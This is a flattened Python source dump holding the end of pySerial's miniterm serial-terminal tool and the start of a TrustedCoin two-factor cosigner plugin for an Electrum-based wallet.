self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
trustedcoin.py | #!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum_exos import ecc, constants, keystore, version, bip32, bitcoin
from electrum_exos.bitcoin import TYPE_ADDRESS
from electrum_exos.bip32 import BIP32Node, xpub_type
from electrum_exos.crypto import sha256
from electrum_exos.transaction import TxOutput
from electrum_exos.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum_exos.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_exos.i18n import _
from electrum_exos.plugin import BasePlugin, hook
from electrum_exos.util import NotEnoughFunds, UserFacingException
from electrum_exos.storage import STO_EV_USER_PW
from electrum_exos.network import Network
from electrum_exos.base_wizard import BaseWizard
from electrum_exos.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
